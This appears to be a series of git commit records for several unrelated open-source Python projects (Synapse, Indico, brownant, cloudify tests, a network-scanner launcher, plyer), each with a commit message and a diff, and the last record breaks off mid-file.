+ logger.debug('Found %25d members in group %25s', len(self._members), self._group_id)%0A
|
3b2dcfff78d5c330937c4b75f34f79f8e991d8e3
|
Fix logging bug in EDU handling over replication
|
synapse/replication/http/federation.py
|
synapse/replication/http/federation.py
|
# -*- coding: utf-8 -*-
# Copyright 2018 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from twisted.internet import defer
from synapse.events import FrozenEvent
from synapse.events.snapshot import EventContext
from synapse.http.servlet import parse_json_object_from_request
from synapse.replication.http._base import ReplicationEndpoint
from synapse.util.metrics import Measure
logger = logging.getLogger(__name__)
class ReplicationFederationSendEventsRestServlet(ReplicationEndpoint):
"""Handles events newly received from federation, including persisting and
notifying.
The API looks like:
POST /_synapse/replication/fed_send_events/:txn_id
{
"events": [{
"event": { .. serialized event .. },
"internal_metadata": { .. serialized internal_metadata .. },
"rejected_reason": .., // The event.rejected_reason field
"context": { .. serialized event context .. },
}],
"backfilled": false
"""
NAME = "fed_send_events"
PATH_ARGS = ()
def __init__(self, hs):
super(ReplicationFederationSendEventsRestServlet, self).__init__(hs)
self.store = hs.get_datastore()
self.clock = hs.get_clock()
self.federation_handler = hs.get_handlers().federation_handler
@staticmethod
@defer.inlineCallbacks
def _serialize_payload(store, event_and_contexts, backfilled):
"""
Args:
store
event_and_contexts (list[tuple[FrozenEvent, EventContext]])
backfilled (bool): Whether or not the events are the result of
backfilling
"""
event_payloads = []
for event, context in event_and_contexts:
serialized_context = yield context.serialize(event, store)
event_payloads.append({
"event": event.get_pdu_json(),
"internal_metadata": event.internal_metadata.get_dict(),
"rejected_reason": event.rejected_reason,
"context": serialized_context,
})
payload = {
"events": event_payloads,
"backfilled": backfilled,
}
defer.returnValue(payload)
@defer.inlineCallbacks
def _handle_request(self, request):
with Measure(self.clock, "repl_fed_send_events_parse"):
content = parse_json_object_from_request(request)
backfilled = content["backfilled"]
event_payloads = content["events"]
event_and_contexts = []
for event_payload in event_payloads:
event_dict = event_payload["event"]
internal_metadata = event_payload["internal_metadata"]
rejected_reason = event_payload["rejected_reason"]
event = FrozenEvent(event_dict, internal_metadata, rejected_reason)
context = yield EventContext.deserialize(
self.store, event_payload["context"],
)
event_and_contexts.append((event, context))
logger.info(
"Got %d events from federation",
len(event_and_contexts),
)
yield self.federation_handler.persist_events_and_notify(
event_and_contexts, backfilled,
)
defer.returnValue((200, {}))
class ReplicationFederationSendEduRestServlet(ReplicationEndpoint):
"""Handles EDUs newly received from federation, including persisting and
notifying.
Request format:
POST /_synapse/replication/fed_send_edu/:edu_type/:txn_id
{
"origin": ...,
"content: { ... }
}
"""
NAME = "fed_send_edu"
PATH_ARGS = ("edu_type",)
def __init__(self, hs):
super(ReplicationFederationSendEduRestServlet, self).__init__(hs)
self.store = hs.get_datastore()
self.clock = hs.get_clock()
self.registry = hs.get_federation_registry()
@staticmethod
def _serialize_payload(edu_type, origin, content):
return {
"origin": origin,
"content": content,
}
@defer.inlineCallbacks
def _handle_request(self, request, edu_type):
with Measure(self.clock, "repl_fed_send_edu_parse"):
content = parse_json_object_from_request(request)
origin = content["origin"]
edu_content = content["content"]
logger.info(
"Got %r edu from $s",
edu_type, origin,
)
result = yield self.registry.on_edu(edu_type, origin, edu_content)
defer.returnValue((200, result))
class ReplicationGetQueryRestServlet(ReplicationEndpoint):
"""Handle responding to queries from federation.
Request format:
POST /_synapse/replication/fed_query/:query_type
{
"args": { ... }
}
"""
NAME = "fed_query"
PATH_ARGS = ("query_type",)
# This is a query, so let's not bother caching
CACHE = False
def __init__(self, hs):
super(ReplicationGetQueryRestServlet, self).__init__(hs)
self.store = hs.get_datastore()
self.clock = hs.get_clock()
self.registry = hs.get_federation_registry()
@staticmethod
def _serialize_payload(query_type, args):
"""
Args:
query_type (str)
args (dict): The arguments received for the given query type
"""
return {
"args": args,
}
@defer.inlineCallbacks
def _handle_request(self, request, query_type):
with Measure(self.clock, "repl_fed_query_parse"):
content = parse_json_object_from_request(request)
args = content["args"]
logger.info(
"Got %r query",
query_type,
)
result = yield self.registry.on_query(query_type, args)
defer.returnValue((200, result))
class ReplicationCleanRoomRestServlet(ReplicationEndpoint):
"""Called to clean up any data in DB for a given room, ready for the
server to join the room.
Request format:
POST /_synapse/replication/fed_query/:fed_cleanup_room/:txn_id
{}
"""
NAME = "fed_cleanup_room"
PATH_ARGS = ("room_id",)
def __init__(self, hs):
super(ReplicationCleanRoomRestServlet, self).__init__(hs)
self.store = hs.get_datastore()
@staticmethod
def _serialize_payload(room_id, args):
"""
Args:
room_id (str)
"""
return {}
@defer.inlineCallbacks
def _handle_request(self, request, room_id):
yield self.store.clean_room_for_join(room_id)
defer.returnValue((200, {}))
def register_servlets(hs, http_server):
ReplicationFederationSendEventsRestServlet(hs).register(http_server)
ReplicationFederationSendEduRestServlet(hs).register(http_server)
ReplicationGetQueryRestServlet(hs).register(http_server)
ReplicationCleanRoomRestServlet(hs).register(http_server)
|
Python
| 0
|
@@ -5019,9 +5019,9 @@
rom
-$
+%25
s%22,%0A
|
ff0f3b359e4de08cfdc20eede28bf6f02705f211
|
Fix admin account creation dialog
|
indico/modules/users/forms.py
|
indico/modules/users/forms.py
|
# This file is part of Indico.
# Copyright (C) 2002 - 2022 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.
from operator import itemgetter
from pytz import common_timezones, common_timezones_set
from wtforms.fields import BooleanField, EmailField, IntegerField, SelectField, StringField
from wtforms.validators import DataRequired, Email, NumberRange, ValidationError
from indico.core.config import config
from indico.modules.auth.forms import LocalRegistrationForm, _check_existing_email
from indico.modules.users import User
from indico.modules.users.models.emails import UserEmail
from indico.modules.users.models.users import NameFormat
from indico.util.i18n import _, get_all_locales
from indico.web.forms.base import IndicoForm
from indico.web.forms.fields import IndicoEnumSelectField, MultiStringField, PrincipalField, PrincipalListField
from indico.web.forms.util import inject_validators
from indico.web.forms.validators import HiddenUnless
from indico.web.forms.widgets import SwitchWidget
class UserPreferencesForm(IndicoForm):
lang = SelectField(_('Language'))
timezone = SelectField(_('Timezone'))
force_timezone = BooleanField(
_('Use my timezone'),
widget=SwitchWidget(),
description=_("Always use my current timezone instead of an event's timezone."))
show_future_events = BooleanField(
_('Show future events'),
widget=SwitchWidget(),
description=_('Show future events by default.'))
show_past_events = BooleanField(
_('Show past events'),
widget=SwitchWidget(),
description=_('Show past events by default.'))
name_format = IndicoEnumSelectField(_('Name format'), enum=NameFormat,
description=_('Default format in which names are displayed'))
use_previewer_pdf = BooleanField(
_('Use previewer for PDF files'),
widget=SwitchWidget(),
description=_('The previewer is used by default for image and text files, but not for PDF files.'))
add_ical_alerts = BooleanField(
_('Add alerts to iCal'),
widget=SwitchWidget(),
description=_('Add an event reminder to exported iCal files/URLs.'))
add_ical_alerts_mins = IntegerField(
_('iCal notification time'),
[HiddenUnless('add_ical_alerts'), NumberRange(min=0)],
description=_('Number of minutes to notify before an event.'))
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
locales = [(code, f'{name} ({territory})' if territory else name)
for code, (name, territory, __) in get_all_locales().items()]
self.lang.choices = sorted(locales, key=itemgetter(1))
self.timezone.choices = list(zip(common_timezones, common_timezones))
if self.timezone.object_data and self.timezone.object_data not in common_timezones_set:
self.timezone.choices.append((self.timezone.object_data, self.timezone.object_data))
class UserEmailsForm(IndicoForm):
email = EmailField(_('Add new email address'), [DataRequired(), Email()], filters=[lambda x: x.lower() if x else x])
def validate_email(self, field):
conflict = (UserEmail.query
.filter(~User.is_pending,
~UserEmail.is_user_deleted,
UserEmail.email == field.data)
.join(User)
.has_rows())
if conflict:
raise ValidationError(_('This email address is already in use.'))
class SearchForm(IndicoForm):
last_name = StringField(_('Family name'))
first_name = StringField(_('First name'))
email = StringField(_('Email'), filters=[lambda x: x.lower() if x else x])
affiliation = StringField(_('Affiliation'))
exact = BooleanField(_('Exact match'))
include_deleted = BooleanField(_('Include deleted'))
include_pending = BooleanField(_('Include pending'))
external = BooleanField(_('External'))
class MergeForm(IndicoForm):
source_user = PrincipalField(_('Source user'), [DataRequired()],
description=_('The user that will be merged into the target one'))
target_user = PrincipalField(_('Target user'), [DataRequired()],
description=_('The user that will remain active in the end'))
class AdminUserSettingsForm(IndicoForm):
notify_account_creation = BooleanField(_('Registration notifications'), widget=SwitchWidget(),
description=_('Send an email to all administrators whenever someone '
'registers a new local account.'))
email_blacklist = MultiStringField(_('Email blacklist'), field=('email_blacklist', _('email')),
unique=True, flat=True,
description=_('Prevent users from creating Indico accounts with these email '
'addresses. Supports wildcards, e.g. *@gmail.com'))
allow_personal_tokens = BooleanField(_('Personal API tokens'), widget=SwitchWidget(),
description=_('Whether users are allowed to generate personal API tokens. '
'If disabled, only admins can create them, but users will '
'still be able to regenerate the tokens assigned to them.'))
class AdminAccountRegistrationForm(LocalRegistrationForm):
email = EmailField(_('Email address'), [DataRequired(), Email(), _check_existing_email],
filters=[lambda s: s.lower() if s else s])
create_identity = BooleanField(_('Set login details'), widget=SwitchWidget(), default=True)
def __init__(self, *args, **kwargs):
if config.LOCAL_IDENTITIES:
for field in ('username', 'password', 'confirm_password'):
inject_validators(self, field, [HiddenUnless('create_identity')], early=True)
super().__init__(*args, **kwargs)
del self.comment
if not config.LOCAL_IDENTITIES:
del self.username
del self.password
del self.confirm_password
del self.create_identity
class AdminsForm(IndicoForm):
admins = PrincipalListField(_('Admins'), [DataRequired()])
|
Python
| 0
|
@@ -6235,33 +6235,8 @@
gs)%0A
- del self.comment%0A
|
ab4d375010220c4dac97116e2f1bffeca2f0bedc
|
use another handler for user-created redirecting to fix up the test.
|
brownant/app.py
|
brownant/app.py
|
from __future__ import absolute_import, unicode_literals
from six import string_types
from six.moves import urllib
from werkzeug.utils import import_string
from werkzeug.urls import url_decode, url_encode
from werkzeug.routing import Map, Rule, NotFound, RequestRedirect
from .request import Request
from .exceptions import NotSupported
from .utils import to_bytes_safe
class BrownAnt(object):
"""The app which could manage whole crawler system."""
def __init__(self):
self.url_map = Map(strict_slashes=False, host_matching=True,
redirect_defaults=False)
def add_url_rule(self, host, rule_string, endpoint, **options):
"""Add a url rule to the app instance.
The url rule is the same with Flask apps and other Werkzeug apps.
:param host: the matched hostname. e.g. "www.python.org"
:param rule_string: the matched path pattern. e.g. "/news/<int:id>"
:param endpoint: the endpoint name as a dispatching key such as the
qualified name of the object.
"""
rule = Rule(rule_string, host=host, endpoint=endpoint, **options)
self.url_map.add(rule)
def parse_url(self, url_string):
"""Parse the URL string with the url map of this app instance.
:param url_string: the origin URL string.
:returns: the tuple as `(url, url_adapter, query_args)`, the url is
parsed by the standard library `urlparse`, the url_adapter is
from the werkzeug bound URL map, the query_args is a
multidict from the werkzeug.
"""
url = urllib.parse.urlparse(url_string)
url = self.validate_url(url)
url_adapter = self.url_map.bind(server_name=url.hostname,
url_scheme=url.scheme,
path_info=url.path)
query_args = url_decode(url.query)
return url, url_adapter, query_args
def validate_url(self, url):
"""Validate the :class:`~urllib.parse.ParseResult` object.
This method will make sure the :meth:`~brownant.app.BrownAnt.parse_url`
could work as expected even meet a unexpected URL string.
:param url: the parsed url.
:type url: :class:`~urllib.parse.ParseResult`
"""
# fix up the non-ascii path
url_path = to_bytes_safe(url.path)
url_path = urllib.parse.quote(url_path, safe=b"/%")
url = urllib.parse.ParseResult(url.scheme, url.netloc, url_path,
url.params, url.query, url.fragment)
# validate the components of URL
has_hostname = url.hostname is not None and len(url.hostname) > 0
has_http_scheme = url.scheme in ("http", "https")
has_path = not len(url.path) or url.path.startswith("/")
if not (has_hostname and has_http_scheme and has_path):
raise NotSupported("invalid url: %s" % repr(url))
return url
def dispatch_url(self, url_string):
"""Dispatch the URL string to the target endpoint function.
:param url_string: the origin URL string.
:returns: the return value of calling dispatched function.
"""
url, url_adapter, query_args = self.parse_url(url_string)
try:
endpoint, kwargs = url_adapter.match()
handler = import_string(endpoint)
request = Request(url=url, args=query_args)
return handler(request, **kwargs)
except NotFound:
raise NotSupported(url_string)
except RequestRedirect as e:
new_url = "{0.new_url}?{1}".format(e, url_encode(query_args))
return self.dispatch_url(new_url)
def mount_site(self, site):
"""Mount a supported site to this app instance.
:param site: the site instance be mounted.
"""
if isinstance(site, string_types):
site = import_string(site)
site.play_actions(target=self)
def redirect(url):
"""Raise the :class:`~werkzeug.routing.RequestRedirect` exception to lead
the app dispatching current request to another URL.
:param url: the target URL.
"""
raise RequestRedirect(url)
|
Python
| 0
|
@@ -3383,156 +3383,8 @@
h()%0A
- handler = import_string(endpoint)%0A request = Request(url=url, args=query_args)%0A return handler(request, **kwargs)%0A
@@ -3605,16 +3605,263 @@
w_url)%0A%0A
+ try:%0A handler = import_string(endpoint)%0A request = Request(url=url, args=query_args)%0A return handler(request, **kwargs)%0A except RequestRedirect as e:%0A return self.dispatch_url(e.new_url)%0A%0A
def
|
c00c83ad1ef24a117a682d48e15d5f0c452c77fb
|
fix test
|
system_tests/manager/test_docker_plugin.py
|
system_tests/manager/test_docker_plugin.py
|
# Copyright (c) 2015 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
import os
from fabric.api import settings, run
from cloudify.workflows import local
from cosmo_tester.framework.testenv import TestCase
from cosmo_tester.framework.cfy_helper import cfy
IGNORED_LOCAL_WORKFLOW_MODULES = (
'worker_installer.tasks',
'plugin_installer.tasks'
)
class TestDockerPlugin(TestCase):
def setUp(self):
super(TestDockerPlugin, self).setUp()
self.blueprint_path = \
os.path.join(os.path.dirname(__file__),
'resources', 'blueprint.yaml')
if self.env.install_plugins:
cfy.local.install_plugins(
blueprint_path=self.blueprint_path).wait()
inputs = {
'current_ip': '0.0.0.0/0',
'external_network_name': self.env.external_network_name,
'image_id': self.env.ubuntu_trusty_image_id,
'flavor_id': self.env.small_flavor_id,
'key_name': self.docker_host_key_name,
'private_key_path': self.docker_host_key_path,
'core_branch': self.core_branch,
'plugins_branch': self.plugins_branch,
'docker_plugin_branch': self.docker_plugin_branch,
'agent_user': 'ubuntu',
'openstack_config': {
'username': self.env.keystone_username,
'password': self.env.keystone_password,
'tenant_name': self.env.keystone_tenant_name,
'auth_url': self.env.keystone_url
}
}
self.local_env = local.init_env(
self.blueprint_path, name=self._testMethodName,
inputs=inputs,
ignored_modules=IGNORED_LOCAL_WORKFLOW_MODULES)
def tearDown(self):
super(TestDockerPlugin, self).tearDown()
self.local_env.execute('uninstall', task_retries=20)
def test_plugin(self):
self.local_env.execute('install', task_retries=10)
keypair = {}
host = {}
for node in self.local_env.storage.get_nodes():
if 'docker_system_test_keypair' in node.id:
keypair = node
for node_instance in self.local_env.storage.get_node_instances():
if 'docker_system_test_floating_ip' in node_instance.node_id:
host = node_instance
if not keypair or not host:
raise Exception(
'Keypair {0} or host {0} cannot be None.'
.format(keypair, host))
fabric_env = {
'user': 'ubuntu',
'key_filename': keypair.properties['private_key_path'],
'host_string': host.runtime_properties['floating_ip_address']
}
command = 'source cloudify_system_test/bin/activate && ' \
'nosetests --with-cov --cov-report term-missing ' \
'--cov docker_system_test/docker_plugin ' \
'docker_system_test/docker_plugin/tests'
with settings(**fabric_env):
result = run(command)
self.assertIn('OK', result)
@property
def core_branch(self):
return os.environ.get('BRANCH_NAME_CORE', 'master')
@property
def plugins_branch(self):
return os.environ.get('BRANCH_NAME_PLUGINS', 'master')
@property
def docker_plugin_branch(self):
return self.plugins_branch
@property
def docker_host_key_name(self):
return 'docker_system_test_key'
@property
def docker_host_key_path(self):
return '~/.ssh/docker_system_test_key.pem'
|
Python
| 0.000002
|
@@ -1221,25 +1221,44 @@
ocal
-.
+(%0A '
install
-_
+-
plugins
-(
+',
%0A
|
5ffa9f7054f9fcced99e366cfb8ea6de4dd1a01c
|
Recognize "Sinhala" as an Indic script
|
hindkit/constants/linguistics.py
|
hindkit/constants/linguistics.py
|
INDIC_SCRIPTS = {
'devanagari': {
'abbreviation': 'dv',
'indic1 tag': 'deva',
'indic2 tag': 'dev2',
},
'bangla': {
'abbreviation': 'bn',
'indic1 tag': 'beng',
'indic2 tag': 'bng2',
'alternative name': 'Bengali',
},
'gurmukhi': {
'abbreviation': 'gr',
'indic1 tag': 'guru',
'indic2 tag': 'gur2',
},
'gujarati': {
'abbreviation': 'gj',
'indic1 tag': 'gujr',
'indic2 tag': 'gjr2',
},
'odia': {
'abbreviation': 'od',
'indic1 tag': 'orya',
'indic2 tag': 'ory2',
'alternative name': 'Oriya',
},
'tamil': {
'abbreviation': 'tm',
'indic1 tag': 'taml',
'indic2 tag': 'tml2',
},
'telugu': {
'abbreviation': 'tl',
'indic1 tag': 'telu',
'indic2 tag': 'tel2',
},
'kannada': {
'abbreviation': 'kn',
'indic1 tag': 'knda',
'indic2 tag': 'knd2',
},
'malayalam': {
'abbreviation': 'ml',
'indic1 tag': 'mlym',
'indic2 tag': 'mlm2',
},
}
|
Python
| 0.998315
|
@@ -1121,11 +1121,89 @@
,%0A %7D,
+%0A%0A 'sinhala': %7B%0A 'abbreviation': 'si',%0A 'tag': 'sinh',%0A %7D,
%0A%7D%0A
|
81fba21d0788d95c44496ca327c2df68cdf34163
|
terminate processes before exit
|
core/parse.py
|
core/parse.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import multiprocessing
import time
import os
import datetime
import random
import string
import sys
from core.targets import analysis
from core.attack import start_attack
from core.alert import info
from core.alert import warn
from core.alert import error
from core.alert import write
from core.alert import messages
from core.log import sort_logs
from core.load_modules import load_all_modules
from core.load_modules import load_all_graphs
from core.args_loader import load_all_args
from core.args_loader import check_all_required
from core.update import _check
from core.compatible import _version_info
def load():
write('\n\n')
# load libs
from core.color import finish
# load all modules in lib/brute, lib/scan, lib/graph
module_names = load_all_modules()
graph_names = load_all_graphs()
# Parse ARGVs
try:
parser, options, startup_update_flag = load_all_args(module_names, graph_names)
except SystemExit:
finish()
sys.exit(1)
# Filling Options
check_ranges = options.check_ranges
check_subdomains = options.check_subdomains
targets = options.targets
targets_list = options.targets_list
thread_number = options.thread_number
thread_number_host = options.thread_number_host
log_in_file = options.log_in_file
scan_method = options.scan_method
exclude_method = options.exclude_method
users = options.users
users_list = options.users_list
passwds = options.passwds
passwds_list = options.passwds_list
timeout_sec = options.timeout_sec
ports = options.ports
time_sleep = options.time_sleep
language = options.language
verbose_level = options.verbose_level
show_version = options.show_version
check_update = options.check_update
proxies = options.proxies
proxies_file = options.proxies_file
retries = options.retries
graph_flag = options.graph_flag
help_menu_flag = options.help_menu_flag
ping_flag = options.ping_flag
methods_args = options.methods_args
method_args_list = options.method_args_list
# Checking Requirements
(targets, targets_list, thread_number, thread_number_host,
log_in_file, scan_method, exclude_method, users, users_list,
passwds, passwds_list, timeout_sec, ports, parser, module_names, language, verbose_level, show_version,
check_update, proxies, proxies_file, retries, graph_flag, help_menu_flag, methods_args, method_args_list) = \
check_all_required(
targets, targets_list, thread_number, thread_number_host,
log_in_file, scan_method, exclude_method, users, users_list,
passwds, passwds_list, timeout_sec, ports, parser, module_names, language, verbose_level, show_version,
check_update, proxies, proxies_file, retries, graph_flag, help_menu_flag, methods_args, method_args_list
)
info(messages(language, 0))
# check for update
if startup_update_flag is True:
__version__, __code_name__ = _version_info()
_check(__version__, __code_name__, language)
info(messages(language, 96).format(len(load_all_modules()) - 1 + len(load_all_graphs())))
suff = str(datetime.datetime.now()).replace(' ', '_').replace(':', '-') + '_' + ''.join(
random.choice(string.ascii_uppercase + string.digits) for _ in range(10))
subs_temp = 'tmp/subs_temp_%s' % (suff)
range_temp = 'tmp/ranges_%s' % (suff)
total_targets = -1
for total_targets, _ in enumerate(
analysis(targets, check_ranges, check_subdomains, subs_temp, range_temp, log_in_file, time_sleep,
language, verbose_level, show_version, check_update, proxies, retries)):
pass
total_targets += 1
total_targets = total_targets * len(scan_method)
targets = analysis(targets, check_ranges, check_subdomains, subs_temp, range_temp, log_in_file, time_sleep,
language, verbose_level, show_version, check_update, proxies, retries)
trying = 0
for target in targets:
for sm in scan_method:
trying += 1
p = multiprocessing.Process(target=start_attack, args=(
str(target).rsplit()[0], trying, total_targets, sm, users, passwds, timeout_sec, thread_number,
ports, log_in_file, time_sleep, language, verbose_level, show_version, check_update, proxies,
retries, ping_flag, methods_args))
p.start()
while 1:
n = 0
for process in multiprocessing.active_children():
if process.is_alive() is True:
n += 1
else:
process.remove(thread)
if n >= thread_number_host:
time.sleep(0.01)
else:
break
while 1:
try:
exitflag = True
for process in multiprocessing.active_children():
if process.is_alive() is True:
exitflag = False
time.sleep(0.01)
if exitflag is True:
break
except KeyboardInterrupt:
break
info(messages(language, 42))
os.remove(subs_temp)
os.remove(range_temp)
info(messages(language, 43))
sort_logs(log_in_file, language, graph_flag)
write('\n')
info(messages(language, 44))
write('\n\n')
finish()
|
Python
| 0.000001
|
@@ -5199,16 +5199,114 @@
errupt:%0A
+ for process in multiprocessing.active_children():%0A process.terminate()%0A
|
0b7a5929208bddb9e850f10ff40f1521363283fd
|
decrease map_stats precision
|
ichnaea/map_stats.py
|
ichnaea/map_stats.py
|
import csv
from cStringIO import StringIO
from ichnaea.db import Measure
def map_stats_request(request):
session = request.database.session()
query = session.query(Measure.lat, Measure.lon)
unique = set()
for lat, lon in query:
unique.add(((lat // 10000) / 1000.0, (lon // 10000) / 1000.0))
rows = StringIO()
csvwriter = csv.writer(rows)
csvwriter.writerow(('lat', 'lon'))
for lat, lon in unique:
csvwriter.writerow((lat, lon))
return rows.getvalue()
|
Python
| 0.000007
|
@@ -265,32 +265,33 @@
d(((lat // 10000
+0
) / 1000.0, (lon
@@ -295,24 +295,25 @@
lon // 10000
+0
) / 1000.0))
|
3def5ee6b6ffbb60260130deedee65cfc0e186f0
|
add missing super() constructor in IosAccelerometer
|
plyer/platforms/ios/accelerometer.py
|
plyer/platforms/ios/accelerometer.py
|
'''
iOS accelerometer
-----------------
Taken from: https://pyobjus.readthedocs.org/en/latest/pyobjus_ios.html#accessing-accelerometer
'''
from plyer.facades import Accelerometer
from pyobjus import autoclass
class IosAccelerometer(Accelerometer):
def __init__(self):
self.bridge = autoclass('bridge').alloc().init()
self.bridge.motionManager.setAccelerometerUpdateInterval_(0.1)
def _enable(self):
self.bridge.startAccelerometer()
def _disable(self):
self.bridge.stopAccelerometer()
def _get_acceleration(self):
return (
self.bridge.ac_x,
self.bridge.ac_y,
self.bridge.ac_z)
def instance():
return IosAccelerometer()
|
Python
| 0.000001
|
@@ -262,32 +262,81 @@
__init__(self):%0A
+ super(IosAccelerometer, self).__init__()%0A
self.bri
|
2fecbb4be4ade123d51e0bd8b70b016fbf9639f0
|
fix double ast output
|
src/c2p.py
|
src/c2p.py
|
from antlr4_generated.SmallCLexer import SmallCLexer
from antlr4_generated.SmallCParser import SmallCParser
from AbstractSyntaxTree import *
from Listener import *
from ErrorHandler import *
from SymbolTable import *
from VisitorDefinitionProcessor import *
from VisitorDeclarationProcessor import *
from VisitorTypeChecker import *
from VisitorCodeGenerator import *
import argparse
import traceback
import sys
import time
import os.path
# GLOBAL VARIABLES
SAVE_AST = False
SAVE_SYMBOL_TABLE = False
PRINT_TIMINGS = False
PRINT_NOTHING = False
OUT_FILE_NAME = "out.p"
def output(text, is_timing=False):
if PRINT_NOTHING:
return
if is_timing and not PRINT_TIMINGS:
return
print(text)
def parseFile(filename):
timeNow = time.time()
input_file = FileStream(filename)
output("file read: " + str(time.time() - timeNow), is_timing=True)
# get lexer
timeNow = time.time()
lexer = SmallCLexer(input_file)
output("file lexed: " + str(time.time() - timeNow), is_timing=True)
# get list of matched tokens
timeNow = time.time()
stream = CommonTokenStream(lexer)
output("file tokenized: " + str(time.time() - timeNow), is_timing=True)
# pass tokens to the parser
parser = SmallCParser(stream)
# specify the entry point
timeNow = time.time()
programContext = parser.program() # tree with program as root
output("file parsed: " + str(time.time() - timeNow), is_timing=True)
# quit if there are any syntax errors
if parser._syntaxErrors > 0:
sys.exit(0)
return programContext
def buildAST(parseTreeRoot):
timeNow = time.time()
# create an AST an attach it to a listener so the listener can fill in the tree
abstractSyntaxTree = AbstractSyntaxTree()
walker = ParseTreeWalker()
listener = Listener(abstractSyntaxTree)
# attach the listener, walk the parse tree, and fill in the AST
walker.walk(listener, parseTreeRoot)
# output the resulting AST after the walk
output("AST built: " + str(time.time() - timeNow), is_timing=True)
output(str(abstractSyntaxTree))
if SAVE_AST:
# os.path.splitext(name) splits name into tuple: (name without extension, extension)
filename = os.path.splitext(OUT_FILE_NAME)[0] + "_AST.txt"
outfile = open(filename, 'w')
outfile.write(str(abstractSyntaxTree))
outfile.close()
return abstractSyntaxTree
def scopeCheck(abstractSyntaxTree, errorHandler, symbolTable):
timeNow = time.time()
functionFiller = VisitorDefinitionProcessor(symbolTable, errorHandler)
functionFiller.visitProgramNode(abstractSyntaxTree.root)
output("symbol table filled: " + str(time.time() - timeNow), is_timing=True)
symbolTable.traverseOn()
symbolTable.resetToRoot()
timeNow = time.time()
tableFiller = VisitorDeclarationProcessor(symbolTable, errorHandler)
tableFiller.visitProgramNode(abstractSyntaxTree.root)
output("symbol table checked: " + str(time.time() - timeNow), is_timing=True)
output(str(symbolTable))
if SAVE_SYMBOL_TABLE:
# os.path.splitext(name) splits name into tuple: (name without extension, extension)
filename = os.path.splitext(OUT_FILE_NAME)[0] + "_symbol_table.txt"
outfile = open(filename, 'w')
outfile.write(str(symbolTable))
outfile.close()
def typeCheck(abstractSyntaxTree, errorHandler):
timeNow = time.time()
typeCheck = VisitorTypeChecker(errorHandler)
typeCheck.visitProgramNode(abstractSyntaxTree.root)
output("program type checked: " + str(time.time() - timeNow), is_timing=True)
def generateCode(abstractSyntaxTree, symbolTable):
timeNow = time.time()
codeGenerator = VisitorCodeGenerator(symbolTable, OUT_FILE_NAME)
codeGenerator.visitProgramNode(abstractSyntaxTree.root)
output("code generated: " + str(time.time() - timeNow), is_timing=True)
def main(filename):
# get the root of the parse tree of the input file
parseTreeRoot = parseFile(filename)
# the errorHandler which will group all of the errors
errorHandler = ErrorHandler(filename)
try:
# create an AST an attach it to a listener so the listener can fill in the tree
abstractSyntaxTree = buildAST(parseTreeRoot)
output(str(abstractSyntaxTree))
# create a symbol table and symbol table filler, fill in the table and check if everything is declared before it is used in the c file
symbolTable = SymbolTable()
scopeCheck(abstractSyntaxTree, errorHandler, symbolTable)
# do the type checking
typeCheck(abstractSyntaxTree, errorHandler)
# generate code
symbolTable.resetToRoot()
if not errorHandler.errorCount():
generateCode(abstractSyntaxTree, symbolTable)
except Exception as e:
ex_type, ex, tb = sys.exc_info()
traceback.print_exception(ex_type, ex, tb)
if errorHandler.errorCount() or errorHandler.warningCount():
print(str(errorHandler.errorCount()) + " error" + ("s" if errorHandler.errorCount() != 1 else ""))
print(str(errorHandler.warningCount()) + " warning" + ("s" if errorHandler.warningCount() != 1 else ""))
errorHandler.printErrors()
if __name__=="__main__":
argparser = argparse.ArgumentParser(description="A C to P compiler")
argparser.add_argument("filename", help="The filename of the c program")
# saveast as per assignment constraint
argparser.add_argument("-save-ast", "--save-ast", "-saveast", "--saveast", help="Serializes the AST and saves it to {OUTFILE}_AST.txt", action="store_true", default=False)
argparser.add_argument("-save-symbol-table", "--save-symbol-table", help="Serializes the symbol table and saves it to {OUTFILE}_symbol_table.txt", action="store_true", default=False)
argparser.add_argument("-t", "--timings", help="Shows how long each step of the process takes", action="store_true", default=False)
argparser.add_argument("-q", "--quiet", help="Disables the printing of the AST and symbol table", action="store_true", default=False)
argparser.add_argument("-o", help="Specifies the output filename (preferably with .p filename extension)", default="out.p")
args = argparser.parse_args()
# set global variables
SAVE_AST = args.save_ast
SAVE_SYMBOL_TABLE = args.save_symbol_table
PRINT_TIMINGS = args.timings
PRINT_NOTHING = args.quiet
OUT_FILE_NAME = args.o
main(args.filename)
|
Python
| 0.003161
|
@@ -4363,48 +4363,8 @@
t)%0A%0A
- output(str(abstractSyntaxTree))%0A
|
b041b16c1db2da49cd4814d4165fc372bdd3903f
|
Handle absence of LinuxFileChooser backend
|
plyer/platforms/linux/filechooser.py
|
plyer/platforms/linux/filechooser.py
|
'''
Linux file chooser
------------------
'''
from plyer.facades import FileChooser
from distutils.spawn import find_executable as which
import os
import subprocess as sp
import time
class SubprocessFileChooser(object):
'''A file chooser implementation that allows using
subprocess back-ends.
Normally you only need to override _gen_cmdline, executable,
separator and successretcode.
'''
executable = ""
'''The name of the executable of the back-end.
'''
separator = "|"
'''The separator used by the back-end. Override this for automatic
splitting, or override _split_output.
'''
successretcode = 0
'''The return code which is returned when the user doesn't close the
dialog without choosing anything, or when the app doesn't crash.
'''
path = None
multiple = False
filters = []
preview = False
title = None
icon = None
show_hidden = False
def __init__(self, *args, **kwargs):
self._handle_selection = kwargs.pop(
'on_selection', self._handle_selection
)
# Simulate Kivy's behavior
for i in kwargs:
setattr(self, i, kwargs[i])
@staticmethod
def _handle_selection(selection): # pylint: disable=method-hidden
'''
Dummy placeholder for returning selection from chooser.
'''
return selection
_process = None
def _run_command(self, cmd):
self._process = sp.Popen(cmd, stdout=sp.PIPE)
while True:
